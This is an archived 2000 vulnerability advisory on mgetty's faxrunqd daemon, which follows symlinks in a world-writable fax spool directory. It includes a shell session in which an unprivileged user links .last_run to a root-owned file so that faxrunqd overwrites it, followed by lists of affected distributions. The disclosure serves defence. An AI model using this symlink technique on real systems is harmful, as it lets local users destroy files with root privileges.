OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Advisory: mgetty local compromise
From: Stan Bubrouski (satanFASTDIAL.NET)
Date: Sat Aug 26 2000 - 01:23:05 CDT


Author : Stan Bubrouski
Date : August 26, 2000
Package : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity : faxrunqd follows symbolic links when creating
certain files. The default location
                             for the files is /var/spool/fax/outgoing,
which is a world-writable directory. Local
                             users can destroy the contents of any file on
a mounted filesystem because faxrunqd is
                             usually run by root.
Problem : mgetty comes with a program named faxrunqd, which is
a daemon to send fax jobs queued
                             by faxspool(1). Upon successful execution, a
file named .last_run is created in the
                             /var/spool/fax/outgoing/ directory which is
world-writable. The problem lies in the
                             fact faxrunqd will follow symlinks created by
any user, allowing file creation anywhere
                             and allowing existing files to be
overwritten/destroyed.
Example:

Remote unprivilaged user:
[userking /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[userking /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[userking /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[userking /tmp]$ cat /etc/smash_me
Smash me!!!
[userking /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[userking /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

Root console:
[rootking /tmp]# faxrunqd -l ttyS0
...

Remote unprivilaged user:
[userking /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[userking /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[userking /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
[userking /tmp]$

Believed to be vulnerable:

Red Hat Linux 6.2 and all prior versions (Vulnerable)
Linux-Mandrake 7.1 and all prior versions (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1 (Untested)
LinuxPPC 1999 and 2000 (Untested)
TurboLinux 4.0, 6.0 (Untested)
Debian 2.2 (potato), 2.1 (slink) (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2 (Untested)
MkLinux Pre Release 1 (R1) (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4 (Untested)
Think Blue Linux 1.0 (Linux for the S/390) (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...

Believed to be unaffected:
SuSE - all versions
Slackware - all versions